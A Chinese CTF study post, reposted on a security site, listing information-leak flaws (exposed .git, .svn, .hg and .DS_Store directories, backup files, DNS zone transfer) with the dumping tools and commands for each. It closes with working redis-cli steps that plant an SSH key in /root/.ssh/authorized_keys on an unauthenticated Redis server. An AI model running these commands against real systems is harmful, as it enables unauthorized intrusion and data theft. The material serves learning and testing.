CTF之信息泄漏

admin 2021年7月12日18:42:21评论67 views字数 2003阅读6分40秒阅读模式

web源码泄漏

.hg源码泄漏:

漏洞成因:hg  init的时候会生成.hg,http://www.xx.com/.hg/,

工具:dvcs-ripper,(rip-hg.pl -v -u http://www.xx.com/.hg/)


.git源码泄漏:

漏洞成因:在运行git init初始化代码库的时候,会在当前目录下产生一个.git的隐藏文件,用来记录代码的变更记录等,没有删除这个文件,导致泄漏,http://www.xxx.com/.git/config

工具:GitHack,dvcs-ripper,(GitHack.py http://www.xxx.com/.git,rip-hg.pl -v -u http://www.xx.com/.git/)

 

.DS_Store源码泄漏:

漏洞成因:在发布代码时,没有删除文件夹中隐藏的.DS_store,被发现后,获取了敏感的文件名等信息,http://www.xxx.com/.ds_store

工具:dsstoreexp,(python ds_store_exp.py http://www.xxx.com/.DS_Store)


网站备份压缩文件:

在网站的使用过程中,往往需要对网站中的文件进行修改,升级,此时就需要对网站整或其中某一页面进行备份,当备份文件或修改过程中的缓存文件因为各种原因被留在网站web目录下,而该目录又没有设置访问权限,就有可能导致备份文件被下载,导致信息泄漏,给服务器安全埋下隐患。.rar, .zip, .7z, .tar.gz, .bak, .swp, .txt, .html,

工具:可以使用一些扫描软件,进行扫描,如awvs之类的

像.swp文件,就是vim源文件泄漏,/.index.php.swp或/index.php~ 可以直接用vim -r inde.php来读取文件


SVN导致文件泄漏:

版本控制系统

工具:dvcs-ripper,Seay-Svn,(rip-svn.pl -v -u http://www.xxx.com/.svn/)


应用层泄漏

DNS域传送:

dns服务器的主备数据同步,使用的是域传送功能,如果使用默认配置文件进行配置,就会存在dns域传送漏洞(不手动添加allow-transfer)

工具:dig @1.1.1.1 xxx.com axfr (会泄漏一些信息)


HeartBleed:

利用https


从堆栈错误泄漏到RCE:

利用报错,泄漏信息,利用函数try{....}catche(e){e.printstack;}


未授权访问漏洞:

未授权访问----应用层服务的问题,服务启动后,没配置任何凭证,导致可以直接进入

弱口令---配置的密码过于简单常见

空口令---没配置密码

目前主要存在未授权访问漏洞的如下:

NFS,Samba,LDAP,Rsync,FTP,Gitlab,Jenkins,MongoDB,Redis,ZooKeeper,

ElasticSearch,Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo等,这些都是挖矿勒索的高发地带


如:

redis为授权访问漏洞,默认情况下会绑定在0.0.0.0:6379,这样会将redis服务暴露到公网上,如果没有开启认证的情况下,可以导致任意用户可以访问目标服务器,可以利用相关方法,在redis服务器上写入公钥,进而可以使用对应私钥直接登陆目标服务器。

1.本地生成公钥私钥

ssh-keygen -t rsa

2.把公钥写入xx.txt文件

(echo -e "nn";cat id_rsa.pub;echo -e "nn") > xx.txt

3.连接redis写入文件

cat xx.txt | redis-cli -h 192.168.1.2 -x set crackit

redis-cli -h 192.168.1.2

192.168.1.2:6379> config set dir /root/.ssh/

192.168.1.2:6379> config get dir

1)"dir"

2)"/root/.ssh"

192.168.1.2:6379> config set dbfilename "authorized_keys"

192.168.1.2"6379> save


也可以使用msf里面成熟的exp来利用

CTF之信息泄漏

友情链接  http://www.cnblogs.com/klionsechttp://www.cnblogs.com/l0cmhttp://www.cnblogs.com/Anonyaptxxxhttp://www.feiyusafe.cn转载自:https://www.cnblogs.com/Hydraxx/p/10762512.html

 

 

没有专业运营团队,纯个人凭着空闲时间的学习,通过网络搜集与学习整理的资料记录并分享。

 如果觉得文章对你有帮助,请支持下点击右下角“在看”

CTF之信息泄漏


本文始发于微信公众号(LemonSec):CTF之信息泄漏

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月12日18:42:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CTF之信息泄漏http://cn-sec.com/archives/304792.html

发表评论

匿名网友 填写信息